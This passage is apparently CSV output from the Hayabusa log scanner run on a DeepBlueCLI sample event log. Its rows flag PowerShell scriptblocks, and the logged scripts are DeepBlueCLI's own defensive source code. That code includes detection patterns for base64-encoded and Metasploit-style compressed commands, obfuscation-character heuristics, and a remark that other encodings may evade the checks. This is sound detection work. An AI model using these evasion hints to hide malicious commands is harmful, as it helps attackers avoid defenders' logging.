Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:05.661 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:07.371 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.803 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:14.325 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:28.096 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:34.598 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:34.600 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:34.601 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:35.043 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:42.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[3].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:42.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:45.375 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[4].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:45.376 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:48.413 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[5].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:48.416 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:51.394 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[6].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:51.396 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:17.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal 